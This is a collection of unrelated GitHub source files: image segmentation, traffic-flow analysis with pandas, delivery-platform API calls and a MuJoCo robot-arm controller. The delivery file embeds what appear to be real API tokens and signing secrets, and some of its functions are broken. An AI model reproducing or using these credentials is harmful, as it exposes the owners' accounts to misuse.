attempt_logout('https://unlockitsocketapp.herokuapp.com/api/simple/students/{}/'.format(registeredCard))\n\nmain()\n\n\n","repo_name":"jonahcancio/unlockitsocket_rpi","sub_path":"unlockit_socket.py","file_name":"unlockit_socket.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"72467619068","text":"import cv2\nimport numpy as np\ndef segmentation(rgb_image, limite_inferior = 5, limite_superior = 170):\n ''' \n rgb_image: imagem RGB\n limite_inferior: limite inferior para considerar vermelho no canal H do HSV\n limite_superior: limite superior para considerar vermelho no canal H do HSV\n Retorna a imagem RGB com o pixels foram da região segmentada zerados\n '''\n \n #Convertendo a imagem para HSV\n hsv_image = cv2.cvtColor(rgb_image, cv2.COLOR_RGB2HSV)\n\n #Pegando canal H\n h_image = hsv_image[:,:,0]\n \n #Pegando valores menores que 10 e maiores que 170 do canal H, que representa vermelho o restante é serado\n mascara_binaria = np.zeros((h_image.shape[0],h_image.shape[1]),np.uint8)\n mascara_binaria[(h_image[:,:] <= limite_inferior) | (h_image[:,:] >= limite_superior)] = 1\n \n # Converte a máscara binária para o formato RGB\n mascara_binaria_rgb = cv2.cvtColor(mascara_binaria, cv2.COLOR_GRAY2RGB)\n \n return mascara_binaria_rgb*rgb_image\n\ndef save_img(rbg_img, name_img):\n \n cv2.imwrite(name_img,rbg_img)","repo_name":"mauriciobenjamin700/IC_V2","sub_path":"Aplicativo/Desktop/Tkinter/build/lib/pacote/segmentation_02.py","file_name":"segmentation_02.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39939943300","text":"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport matplotlib.pyplot as plt\nimport numpy as np \nimport pandas as pd \n\nimport os\nimport sys\n\nimport matplotlib.colors as colors\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nimport sumolib # noqa\nfrom sumolib.visualization import helpers\n\nimport csv\nimport os\n\n\ndef SetClasse(value):\n if isinstance(value, float):\n if (value >= 0 and value <= 0.15): return 'Free-flow'\n elif (value > 0.15 and value <= 0.33): return 'Reasonably Free-flow'\n elif (value > 0.33 and value <= 0.50): return 'Stable-flow'\n elif (value > 0.50 and value <= 0.60): return 'Approaching unstable-flow'\n elif (value > 0.60 and value <= 0.70): return 'Unstable-flow'\n elif (value > 0.70 and value <= 1.00): return 'Breakdown-flow'\n else:\n return 1 #'Free-flow'\n else:\n return str(value)\n\n\ndef Query(EXP, ROAD, SLOT):\n \n # BASELINE GERAL ***************************************\n df1 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_GERAL.csv\")\n df1['Slot'] = df1['Slot'].astype(int)\n df1['Media'] = df1['Media'].astype(float)\n df1['Velo'] = df1['Velo'].astype(float)\n df1['Classe'] = df1['Classe'].astype(float)\n df1['STime'] = df1['STime'].astype(float)\n df1['Timer'] = df1['Timer'].astype(float)\n df1['Source'] = \"Baseline\"\n\n # df5['ClusterLOS'] = df5['ClusterLOS'].astype(float)\n df1['ClasseNum'] = df1['Classe'].map(lambda x: SetClasse(x))\n res = df1\n res.sort_values(by=['STime'])\n df1_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n # BASELINE 1TO2 ***************************************\n df2 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_1TO2.csv\")\n df2['Slot'] = df2['Slot'].astype(int)\n df2['Media'] = df2['Media'].astype(float)\n df2['Velo'] = df2['Velo'].astype(float)\n df2['Classe'] = df2['Classe'].astype(float)\n df2['STime'] = df2['STime'].astype(float)\n df2['Timer'] = df2['Timer'].astype(float)\n df2['Source'] = \"1TO2\"\n\n df2['ClasseNum'] = df2['Classe'].map(lambda x: SetClasse(x))\n res = df2\n res.sort_values(by=['STime'])\n df2_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n # BASELINE RANDOM ***************************************\n df3 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_RANDOM.csv\")\n df3['Slot'] = df3['Slot'].astype(int)\n df3['Media'] = df3['Media'].astype(float)\n df3['Velo'] = df3['Velo'].astype(float)\n df3['Classe'] = df3['Classe'].astype(float)\n df3['STime'] = df3['STime'].astype(float)\n df3['Timer'] = df3['Timer'].astype(float)\n df3['Source'] = \"RAND\"\n\n df3['ClasseNum'] = df3['Classe'].map(lambda x: SetClasse(x))\n res = df3\n res.sort_values(by=['STime'])\n df3_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n # BASELINE THRESHOLD ***************************************\n df4 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_BASELINE_THRESHOLD.csv\")\n df4['Slot'] = df4['Slot'].astype(int)\n df4['Media'] = df4['Media'].astype(float)\n df4['Velo'] = df4['Velo'].astype(float)\n df4['Classe'] = df4['Classe'].astype(float)\n df4['STime'] = df4['STime'].astype(float)\n df4['Timer'] = df4['Timer'].astype(float)\n df4['Source'] = \"LIM-5\"\n\n df4['ClasseNum'] = df4['Classe'].map(lambda x: SetClasse(x))\n res = df4\n res.sort_values(by=['STime'])\n df4_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n\n # DBSCAN ***************************************\n df5 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_DBSCAN.csv\") \n df5['Slot'] = df5['Slot'].astype(int)\n df5['Media'] = df5['Media'].astype(float)\n df5['Classe'] = df5['Classe'].astype(float)\n df5['STime'] = df5['STime'].astype(float)\n df5['Timer'] = df5['Timer'].astype(float)\n df5['Clusteres'] = df5['Clusteres'].astype(int)\n df5['Source'] = \"DBSCAN\"\n\n # df5['ClusterLOS'] = df5['ClusterLOS'].astype(float)\n df5['ClasseNum'] = df5['Classe'].map(lambda x: SetClasse(x))\n res = df5\n res.sort_values(by=['STime'])\n df5_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n # *****************************************************************************************\n\n # XMEANS ***************************************\n df6 = pd.read_csv(\"../repositorio/\" + EXP + \"/Result_LOS_XMEANS.csv\") \n df6['Slot'] = df6['Slot'].astype(int)\n df6['Media'] = df6['Media'].astype(float)\n df6['Media'] = df6['Media'].astype(float)\n df6['LOS'] = df6['Classe'].astype(float)\n df6['STime'] = df6['STime'].astype(float)\n df6['Clusteres'] = df6['Clusteres'].astype(int)\n df6['Source'] = \"X-Means\"\n\n df6['ClasseNum'] = df6['Classe'].map(lambda x: SetClasse(x))\n res = df6\n res.sort_values(by=['STime'])\n df6_select = res[['RoadTag','Slot','Source','STime', 'Velo','PosX','PosY','ClasseNum','Descricao', 'Classe']]\n # *****************************************************************************************\n\n res = pd.concat([df1_select,df2_select,df3_select,df4_select,df5_select,df6_select], sort=False)\n\n res = res[['RoadTag','Slot','Source','Classe','Descricao']]\n\n # 22|6 - 23|7 - 87|8 (1 sequencia)\n\n res = res[(res[\"RoadTag\"] == ROAD) & (res[\"Slot\"] == SLOT)]\n\n los = res.groupby(['Source', 'RoadTag', 'Slot']).mean()\n\n los['Descricao'] = los['Classe'].map(lambda x: SetClasse(x))\n los['Vehicle'] = EXP\n\n return los\n\n\n\nEXP = \"30\"\nROAD=87\nSLOT=6\n\nwtrResult = csv.writer(open (\"result_los_auto.csv\", 'a'), delimiter=',', lineterminator='\\n')\n\n# wtrResult.writerow (['Source','RoadTag', 'Slot', 'Classe', 'Descricao', 'Vehicle'])\n\npistas = [[22,6], [23,7], [87,8], [22,4], [23,3], [23,4], [23,5], [87,4], [87,6]]\nresult = []\nfor R, S in pistas:\n for C in [30,50,70]: \n print(str(C) + \" - \" + str(R) + \" - \" + str(S))\n los = Query(str(C),R,S)\n los = los.reset_index()\n \n for index, row in los.iterrows():\n wtrResult.writerow ([row[\"Source\"],row[\"RoadTag\"],row[\"Slot\"],row[\"Classe\"],row[\"Descricao\"],row[\"Vehicle\"] ])\n\n\n# print(result)\n# DF = pd.DataFrame(np.asarray(result), columns=['Source', 'RoadTag', 'Slot', 'Classe', 'Descricao', 'Vehicle'])\n# print(DF)\n# wtrResult.writerow (los['Source'], los['RoadTag'])\n\n\n# \n\n\n\n# 22|6 - 23|7 - 87|8 (1 sequencia) oksa\n\n# [22,6]\n# [23,7]\n# [87,8]\n# [22,4]\n# [23,3]\n# [23,4]\n# [23,5]\n# [87,4]\n# [87,6]\n\n\n# for R, S in [[1,2],[1,4]]:\n# print(R)\n# print(S)\n# res = res[(res[\"RoadTag\"] == R) & (res[\"Slot\"] == S)]\n# for C in [30,50,70]:\n# print(C)\n\n\n\n\n\n# LOS = res[['ClasseNum','Descricao']].copy()\n# LOS.drop_duplicates(subset=None, keep=\"first\", inplace=True)\n# LOS=LOS.sort_values(by=['ClasseNum'])\n\n","repo_name":"urbancomp/fogarch","sub_path":"FogLayer/visualization/chart4tab.py","file_name":"chart4tab.py","file_ext":"py","file_size_in_byte":7092,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"3186473299","text":"#!/usr/bin/env python3.5\n\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#from matplotlib.backends.backend_pdf import PdfPages\n\n\nx = pd.read_csv('file.csv', na_values={'Last Name': ['.', 'NA'], 'Pre-Test Score': ['.']})\n\na = x['age']\nprint(a)\n\nb = x['postTestScore']\nprint(b)\n\n\n#do souboru\nf = plt.figure()\nplt.plot(a)\nf.savefig('age.pdf')\n\n#plt.show(b.plot())\n","repo_name":"MilanGren/hello-world","sub_path":"pandas/pnds.py","file_name":"pnds.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"24985705993","text":"# -*- coding:utf-8 -*-\nimport time\nimport base64\nimport hashlib\nimport requests\nimport json\nimport jsonpath\n\n\ndef get_mt_sign(data):\n\n sign_key = 'i0wl5fx35vfyekms'\n\n list_data = list(data.keys())\n string_sign = sign_key\n sort_list = sorted(list_data)\n\n for item in sort_list:\n if item == 'sign':\n continue\n string_sign += str(item)\n if item == 'biz':\n string_sign += str(data[item]).replace(\"'\", '\"')\n else:\n string_sign += str(data[item])\n\n sign = hashlib.sha1(string_sign.encode('utf-8')).hexdigest()\n return sign\n\n\ndef deal_mt(orderid,url_1,fix_biz):\n\n # 获取sign\n timestamp = int(time.time())\n order_id = str(orderid)\n biz = {'biz': fix_biz}\n basic_zd = {\n 'appAuthToken': '5d579664aaa45e487c6dab03dbaaf595ed54468034c05ffe41a554781c8c2a479923dee7c442c471ab34b21e162a6956',\n 'timestamp': timestamp, 'charset': 'utf-8', 'developerId': 100789, 'version': 2}\n basic_payload = basic_zd\n basic_payload_2 = basic_zd\n basic_zd.update(biz)\n\n sign = get_mt_sign(basic_zd)\n\n # 获取配送费\n sign = {'sign': sign}\n biz = {'biz': fix_biz}\n\n basic_payload.update(biz)\n basic_payload.update(sign)\n\n url = url_1\n\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=basic_payload)\n\n return response.text\n\ndef creat_dd():\n\n\ttimestamp=int(time.time())\n\n\tjichu_url=\"/api/order/addOrder\"\n\n\tdict_str = {\n\t\t\"shop_no\": \"63381-4279453\",\n\t\t\"origin_id\":str(orderid),\n\t\t\"city_code\": \"1547215874\",\n\t\t\"cargo_price\": str(order_source),\n\t\t\"is_prepay\":str(order_num),\n\t\t\"receiver_name\": \"1\",\n\t\t\"receiver_address\":\"2\",\n\t\t\"receiver_lat\": str(order_time),\n\t\t\"receiver_lng\": \"0\",\n\t\t\"callback\": \"0\",\n\t\t\"cargo_weight\":str(timestamp),\n\t}\n\ndef dd_get_chengshicode():\n\n\ttimestamp=int(time.time())\n\tjichu_url=\"/api/order/addOrder\"\n\tapp_secret=\"acdc9efb79db1fad06a59dea5f3eb5e3\"\n\tdict_str = {\n \"app_key\": \"dadae480b0594b5b90c\",\n \"body\": \"\",\n \"format\": \"json\",\n \"source_id\": \"63381-4279453\",\n \"timestamp\":timestamp,\n \"v\": \"1.0\",\n \"app_secret\": \"acdc9efb79db1fad06a59dea5f3eb5e3\"\n }\n\n\tlist_dict=sorted(dict_str.keys())\n\tprint(list_dict)\n\tstr_list=app_secret\n\tfor item in list_dict:\n\t\tif item=='app_secret':\n\t\t\tcontinue\n\t\telse:\n\t\t\tstr_list+=str(dict_str[item])\n\n\tstr_list+=app_secret\n\n\n\n\ndef creat_sf(orderid,order_source,order_num,order_time,costomer,costomer_phone,costomer_address,costomer_lng,costomer_lat,total_price):\n\n\ttimestamp=int(time.time())\n\n\tjichu_url=\"/open/api/external/createorder?\"\n\n\tdict_str = {\n\t\t\"shop_id\": \"6250508608337\",\n\t\t\"shop_order_id\":str(orderid),\n\t\t\"dev_id\": \"1547215874\",\n\t\t\"order_source\": str(order_source),\n\t\t\"order_sequence\":str(order_num),\n\t\t\"pay_type\": \"1\",\n\t\t\"lbs_type\":\"2\",\n\t\t\"order_time\": str(order_time),\n\t\t\"is_appoint\": \"0\",\n\t\t\"is_person_direct\": \"0\",\n\t\t\"push_time\":str(timestamp),\n\t\t\"version\": \"17\",\n\t\t\"is_insured\": \"0\",\n\t\t\"receive\": {\n\t\t\t\"user_name\": str(costomer),\n\t\t\t\"user_phone\": str(costomer_phone),\n\t\t\t\"user_address\": str(costomer_address),\n\t\t\t\"user_lng\": str(costomer_lng),\n\t\t\t\"user_lat\": str(costomer_lat)\n\t\t},\n\t\t\"order_detail\": {\n\t\t\t\"total_price\": str(total_price),\n\t\t\t\"product_type\": \"1\",\n\t\t\t\"weight_gram\": \"1000\",\n\t\t\t\"product_num\": \"1\",\n\t\t\t\"product_type_num\": \"1\",\n\t\t\t\"product_detail\": [\"hmj\", \"2\"]\n\t\t}\n\t}\n\n\tpush_str=(str(dict_str)+'&1547215874&98fd298d895379335a8d85a7ed5917c5').replace(\"'\",'\"')\n\n\n\t#计算base64\n\tstr_md5 = hashlib.md5(push_str.encode(encoding='utf-8')).hexdigest()\n\tbytes_url = str_md5.encode(\"utf-8\")\n\tstr_url = base64.b64encode(bytes_url) # 被编码的参数必须是二进制数据\n\tstr_url=str_url.decode('UTF-8')\n\n\turl = \"https://openic.sf-express.com\"+jichu_url+\"sign=\"+str(str_url)\n\n\tpayload = json.dumps(dict_str,ensure_ascii=False)\n\tpayload.replace(' ','').replace(\"'\",'\"')\n\tprint(payload)\n\theaders = {\n\t 'Content-Type': 'application/json'\n\t}\n\n\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\n\tprint(response.text)\n\n# -----------------------------------取消订单-----------------------------------------------\n\ndef cancel_sf(orderid):\n\n\ttimestamp = int(time.time())\n\n\tdict_str = {\n\t\t\"order_id\": str(orderid),\n\t\t\"order_type\": \"2\",\n\t\t\"dev_id\": \"1547215874\",\n\t\t\"push_time\": str(timestamp)\n\t}\n\tpush_str = (str(dict_str) + '&1547215874&98fd298d895379335a8d85a7ed5917c5').replace(\"'\", '\"')\n\n\t# 计算base64\n\tstr_md5 = hashlib.md5(push_str.encode(encoding='utf-8')).hexdigest()\n\tbytes_url = str_md5.encode(\"utf-8\")\n\tstr_url = base64.b64encode(bytes_url) # 被编码的参数必须是二进制数据\n\tstr_url = str_url.decode('UTF-8')\n\n\turl = \"https://openic.sf-express.com/open/api/external/createorder?sign=\" + str(str_url)\n\n\tpayload = json.dumps(dict_str)\n\tpayload.replace(\"'\", '\"')\n\n\theaders = {\n\t\t'Content-Type': 'application/json'\n\t}\n\n\tresponse = requests.request(\"POST\", url, headers=headers, data=payload)\n\n\tprint(response.text)\n\n\ndef cancel_mt_reason(orderid):\n\n\t# timestamp = int(time.time())\n\turl = 'https://api-open-cater.meituan.com/waimai/order/queryZbCancelDeliveryReason'\n\n\tbiz = {\"orderId\": orderid}\n\tbiz = json.dumps(biz)\n\n\tget_data = deal_mt(orderid, url, biz)\n\n\tdata_json = json.loads(get_data)\n\n\treason = jsonpath.jsonpath(data_json, '$..code')\n\n\ndef cancal_mt(orderid,reasonCode,reasonContent):\n\n\t# timestamp = int(time.time())\n\turl = 'https://api-open-cater.meituan.com/waimai/order/cancelZbLogisticsByWmOrderId'\n\n\tbiz = {\n\t\t\"detailContent\": reasonContent,\n\t\t\"orderId\": orderid,\n\t\t\"reasonCode\": reasonCode\n\t}\n\tbiz = json.dumps(biz)\n\n\tget_data = deal_mt(orderid, url, biz)\n\n\tdata_json = json.loads(get_data)\n\tarrivel_time = jsonpath.jsonpath(data_json, '$..code')\n\n","repo_name":"letmedothisa/linux_share","sub_path":"顺丰发配送.py","file_name":"顺丰发配送.py","file_ext":"py","file_size_in_byte":5718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38877393234","text":"#!/usr/bin/env python3\n\n# Author: Paul Daniel (pdd@mp.aau.dk)\n\nfrom collections import defaultdict\nimport os\nfrom pathlib import Path\nimport mujoco_py as mp\nimport time\nimport numpy as np\nfrom simple_pid import PID\nfrom termcolor import colored\nimport ikpy\nfrom pyquaternion import Quaternion\nimport cv2 as cv\nimport matplotlib.pyplot as plt\nimport copy \nfrom decorators import debug\n\n\nclass MJ_Controller(object):\n \"\"\"\n Class for control of an robotic arm in MuJoCo.\n It can be used on its own, in which case a new model, simulation and viewer will be created. \n It can also be passed these objects when creating an instance, in which case the class can be used\n to perform tasks on an already instantiated simulation.\n \"\"\"\n\n def __init__(self, model=None, simulation=None, viewer=None):\n path = os.path.realpath(__file__)\n path = str(Path(path).parent.parent.parent)\n if model==None:\n self.model = mp.load_model_from_path(path + '/UR5+gripper/UR5gripper_2_finger.xml')\n else:\n self.model = model\n if simulation==None:\n self.sim = mp.MjSim(self.model)\n else:\n self.sim = simulation\n if viewer==None:\n self.viewer = mp.MjViewer(self.sim)\n else:\n self.viewer = viewer\n self.create_lists()\n self.groups = defaultdict(list)\n self.groups['All'] = [i for i in range(len(self.sim.data.ctrl))]\n self.create_group('Arm', [i for i in range(5)])\n self.create_group('Gripper', [6])\n self.actuated_joint_ids = np.array([i[2] for i in self.actuators])\n self.reached_target = False\n self.current_output = np.zeros(len(self.sim.data.ctrl))\n self.image_counter = 0\n self.ee_chain = ikpy.chain.Chain.from_urdf_file(path + '/UR5+gripper/ur5_gripper.urdf')\n self.cam_matrix = None\n self.cam_init = False\n self.last_movement_steps = 0\n # self.move_group_to_joint_target()\n\n\n def create_group(self, group_name, idx_list):\n \"\"\"\n Allows the user to create custom objects for controlling groups of joints.\n The method show_model_info can be used to get lists of joints and actuators.\n Args:\n group_name: String defining the désired name of the group.\n idx_list: List containing the IDs of the actuators that will belong to this group.\n \"\"\"\n\n try:\n assert len(idx_list) <= len(self.sim.data.ctrl), 'Too many joints specified!'\n assert group_name not in self.groups.keys(), 'A group with name {} already exists!'.format(group_name)\n assert np.max(idx_list) <= len(self.sim.data.ctrl), 'List contains invalid actuator ID (too high)'\n\n self.groups[group_name] = idx_list\n print('Created new control group \\'{}\\'.'.format(group_name))\n\n except Exception as e:\n print(e)\n print('Could not create a new group.')\n\n def show_model_info(self):\n \"\"\"\n Displays relevant model info for the user, namely bodies, joints, actuators, as well as their IDs and ranges.\n Also gives info on which actuators control which joints and which joints are included in the kinematic chain, \n as well as the PID controller info for each actuator. \n \"\"\"\n\n print('\\nNumber of bodies: {}'.format(self.model.nbody))\n for i in range(self.model.nbody):\n print('Body ID: {}, Body Name: {}'.format(i, self.model.body_id2name(i)))\n\n print('\\nNumber of joints: {}'.format(self.model.njnt))\n for i in range(self.model.njnt):\n print('Joint ID: {}, Joint Name: {}, Limits: {}'.format(i, self.model.joint_id2name(i), self.model.jnt_range[i]))\n\n print('\\nNumber of Actuators: {}'.format(len(self.sim.data.ctrl)))\n for i in range(len(self.sim.data.ctrl)):\n print('Actuator ID: {}, Actuator Name: {}, Controlled Joint: {}, Control Range: {}'.format(i, self.model.actuator_id2name(i), self.actuators[i][3], self.model.actuator_ctrlrange[i]))\n\n print('\\nJoints in kinematic chain: {}'.format([i.name for i in self.ee_chain.links]))\n\n print('\\nPID Info: \\n')\n for i in range(len(self.actuators)):\n print('{}: P: {}, I: {}, D: {}, setpoint: {}, sample_time: {}'.format(self.actuators[i][3], self.actuators[i][4].tunings[0], self.actuators[i][4].tunings[1], \n self.actuators[i][4].tunings[2], self.actuators[i][4].setpoint, self.actuators[i][4].sample_time))\n\n print('\\n Camera Info: \\n')\n for i in range(self.model.ncam):\n print('Camera ID: {}, Camera Name: {}, Camera FOV (y, degrees): {}, Position: {}, Orientation: {}'.format(i, self.model.camera_id2name(i), \n self.model.cam_fovy[i], self.model.cam_pos0[i], self.model.cam_mat0[i]))\n\n\n def create_lists(self):\n \"\"\"\n Creates some basic lists and fill them with initial values. This function is called in the class costructor.\n The following lists/dictionaries are created:\n - controller_list: Contains a controller for each of the actuated joints. This is done so that different gains may be \n specified for each controller.\n - current_joint_value_targets: Same as the current setpoints for all controllers, created for convenience.\n - current_output = A list containing the ouput values of all the controllers. This list is only initiated here, its \n values are overwritten at the first simulation step.\n - actuators: 2D list, each entry represents one actuator and contains:\n 0 actuator ID \n 1 actuator name \n 2 joint ID of the joint controlled by this actuator \n 3 joint name\n 4 controller for controlling the actuator\n \"\"\"\n\n self.controller_list = []\n\n # Values for training\n sample_time = 0.0001\n # p_scale = 1\n p_scale = 3\n i_scale = 0.0\n i_gripper = 0\n d_scale = 0.1\n self.controller_list.append(PID(7*p_scale, 0.0*i_scale, 1.1*d_scale, setpoint=0, output_limits=(-2, 2), sample_time=sample_time)) # Shoulder Pan Joint\n self.controller_list.append(PID(10*p_scale, 0.0*i_scale, 1.0*d_scale, setpoint=-1.57, output_limits=(-2, 2), sample_time=sample_time)) # Shoulder Lift Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.5*d_scale, setpoint=1.57, output_limits=(-2, 2), sample_time=sample_time)) # Elbow Joint\n self.controller_list.append(PID(7*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=-1.57, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 1 Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=-1.57, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 2 Joint\n self.controller_list.append(PID(5*p_scale, 0.0*i_scale, 0.1*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Wrist 3 Joint\n self.controller_list.append(PID(2.5*p_scale, i_gripper, 0.00*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Gripper Joint\n # self.controller_list.append(PID(10.5*p_scale, 0.2, 0.1*d_scale, setpoint=0.0, output_limits=(-1, 1), sample_time=sample_time)) # Gripper Joint\n # self.controller_list.append(PID(2*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=0.2, output_limits=(-0.5, 0.8), sample_time=sample_time)) # Finger 2 Joint 1\n # self.controller_list.append(PID(1*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=0.0, output_limits=(-0.5, 0.8), sample_time=sample_time)) # Middle Finger Joint 1\n # self.controller_list.append(PID(1*p_scale, 0.1*i_scale, 0.05*d_scale, setpoint=-0.1, output_limits=(-0.8, 0.8), sample_time=sample_time)) # Gripperpalm Finger 1 Joint\n\n self.current_target_joint_values = []\n for i in range(len(self.sim.data.ctrl)):\n self.current_target_joint_values.append(self.controller_list[i].setpoint)\n self.current_target_joint_values = np.array(self.current_target_joint_values)\n\n self.current_output = []\n for i in range(len(self.controller_list)):\n self.current_output.append(self.controller_list[i](0))\n\n\n self.actuators = []\n for i in range(len(self.sim.data.ctrl)):\n item = []\n item.append(i)\n item.append(self.model.actuator_id2name(i))\n item.append(self.model.actuator_trnid[i][0])\n item.append(self.model.joint_id2name(self.model.actuator_trnid[i][0]))\n item.append(self.controller_list[i])\n self.actuators.append(item)\n\n\n def actuate_joint_group(self, group, motor_values):\n try:\n assert group in self.groups.keys(), 'No group with name {} exists!'.format(group)\n assert len(motor_values) == len(self.groups[group]), 'Invalid number of actuator values!'\n for i,v in enumerate(self.groups[group]):\n self.sim.data.ctrl[v] = motor_values[i]\n\n except Exception as e:\n print(e)\n print('Could not actuate requested joint group.')\n\n\n def move_group_to_joint_target(self, group='All', target=None, tolerance=0.05, max_steps=10000, plot=False, marker=False, render=True, quiet=False):\n \"\"\"\n Moves the specified joint group to a joint target.\n Args:\n group: String specifying the group to move.\n target: List of target joint values for the group.\n tolerance: Threshold within which the error of each joint must be before the method finishes.\n max_steps: maximum number of steps to actuate before breaking\n plot: If True, a .png image of the group joint trajectories will be saved to the local directory.\n This can be used for PID tuning in case of overshoot etc. The name of the file will be \"Joint_angles_\" + a number.\n marker: If True, a colored visual marker will be added into the scene to visualize the current\n cartesian target.\n \"\"\"\n \n try:\n assert group in self.groups.keys(), 'No group with name {} exists!'.format(group)\n if target is not None:\n assert len(target) == len(self.groups[group]), 'Mismatching target dimensions for group {}!'.format(group)\n ids = self.groups[group]\n steps = 1\n result = ''\n if plot:\n self.plot_list = defaultdict(list)\n self.reached_target = False\n deltas = np.zeros(len(self.sim.data.ctrl))\n\n if target is not None:\n for i,v in enumerate(ids):\n self.current_target_joint_values[v] = target[i]\n # print('Target joint value: {}: {}'.format(v, self.current_target_joint_values[v]))\n\n for j in range(len(self.sim.data.ctrl)):\n # Update the setpoints of the relevant controllers for the group\n self.actuators[j][4].setpoint = self.current_target_joint_values[j]\n # print('Setpoint {}: {}'.format(j, self.actuators[j][4].setpoint))\n\n while not self.reached_target:\n current_joint_values = self.sim.data.qpos[self.actuated_joint_ids]\n\n # self.get_image_data(width=200, height=200, show=True)\n \n # We still want to actuate all motors towards their targets, otherwise the joints of non-controlled\n # groups will start to drift \n for j in range(len(self.sim.data.ctrl)):\n self.current_output[j] = self.actuators[j][4](current_joint_values[j])\n self.sim.data.ctrl[j] = self.current_output[j]\n for i in ids:\n deltas[i] = abs(self.current_target_joint_values[i] - current_joint_values[i])\n\n if steps%1000==0 and target is not None and not quiet:\n print('Moving group {} to joint target! Max. delta: {}, Joint: {}'.format(group, max(deltas), self.actuators[np.argmax(deltas)][3]))\n\n if plot and steps%2==0:\n self.fill_plot_list(group, steps)\n\n temp = self.sim.data.body_xpos[self.model.body_name2id('ee_link')] - [0, -0.005, 0.16]\n\n if marker:\n self.add_marker(self.current_carthesian_target)\n self.add_marker(temp)\n\n if max(deltas) < tolerance:\n #if target is not None and not quiet:\n # print(colored('Joint values for group {} within requested tolerance! ({} steps)'.format(group, steps), color='green', attrs=['bold']))\n result = 'success'\n self.reached_target = True\n # break\n\n if steps > max_steps:\n if not quiet:\n print(colored('Max number of steps reached: {}'.format(max_steps), color='red', attrs=['bold']))\n print('Deltas: ', deltas)\n result = 'max. steps reached: {}'.format(max_steps)\n break\n\n self.sim.step()\n if render:\n self.viewer.render()\n steps += 1\n\n self.last_movement_steps = steps\n\n if plot:\n self.create_joint_angle_plot(group=group, tolerance=tolerance)\n\n return result\n\n\n except Exception as e:\n print(e)\n print('Could not move to requested joint target.')\n\n\n def set_group_joint_target(self, group, target):\n\n idx = self.groups[group]\n try:\n assert len(target) == len(idx), 'Length of the target must match the number of actuated joints in the group.'\n self.current_target_joint_values[idx] = target\n\n except Exception as e:\n print(e)\n print('Could not set new group joint target for group '.format(group))\n\n \n\n def open_gripper(self, half=False, **kwargs):\n \"\"\"\n Opens the gripper while keeping the arm in a steady position.\n \"\"\"\n if half: \n result = self.move_group_to_joint_target(group='Gripper', target=[0.0], max_steps=1000, tolerance=0.05, **kwargs)\n else:\n result = self.move_group_to_joint_target(group='Gripper', target=[0.4], max_steps=1000, tolerance=0.05, **kwargs)\n # print('Open: ', self.sim.data.qpos[self.actuated_joint_ids][self.groups['Gripper']])\n return result\n\n\n def close_gripper(self, **kwargs):\n # def close_gripper(self, render=True, max_steps=1000, plot=False, quiet=True):\n \"\"\"\n Closes the gripper while keeping the arm in a steady position.\n \"\"\"\n\n result = self.move_group_to_joint_target(group='Gripper', target=[-0.4], tolerance=0.01, **kwargs)\n # result = self.move_group_to_joint_target(group='Gripper', target=[-0.4], tolerance=0.05, **kwargs)\n # print('Closed: ', self.sim.data.qpos[self.actuated_joint_ids][self.groups['Gripper']])\n # result = self.move_group_to_joint_target(group='Gripper', target=[0.45, 0.45, 0.55, -0.17], tolerance=0.05, max_steps=max_steps, render=render, marker=True, quiet=quiet, plot=plot)\n return result\n\n\n def grasp(self, **kwargs):\n # def grasp(self, render=True, plot=False):\n \"\"\"\n Attempts a grasp at the current location and prints some feedback on weather it was successful \n \"\"\"\n\n result = self.close_gripper(max_steps=300, **kwargs)\n\n if result == 'success':\n return False\n else:\n return True\n\n\n def move_ee(self, ee_position, **kwargs):\n \"\"\"\n Moves the robot arm so that the gripper center ends up at the requested XYZ-position,\n with a vertical gripper position.\n Args:\n ee_position: List of XYZ-coordinates of the end-effector (ee_link for UR5 setup).\n plot: If True, a .png image of the arm joint trajectories will be saved to the local directory.\n This can be used for PID tuning in case of overshoot etc. The name of the file will be \"Joint_angles_\" + a number.\n marker: If True, a colored visual marker will be added into the scene to visualize the current\n cartesian target.\n \"\"\"\n joint_angles = self.ik(ee_position)\n if joint_angles is not None:\n result = self.move_group_to_joint_target(group='Arm', target=joint_angles, **kwargs)\n # result = self.move_group_to_joint_target(group='Arm', target=joint_angles, tolerance=0.05, plot=plot, marker=marker, max_steps=max_steps, quiet=quiet, 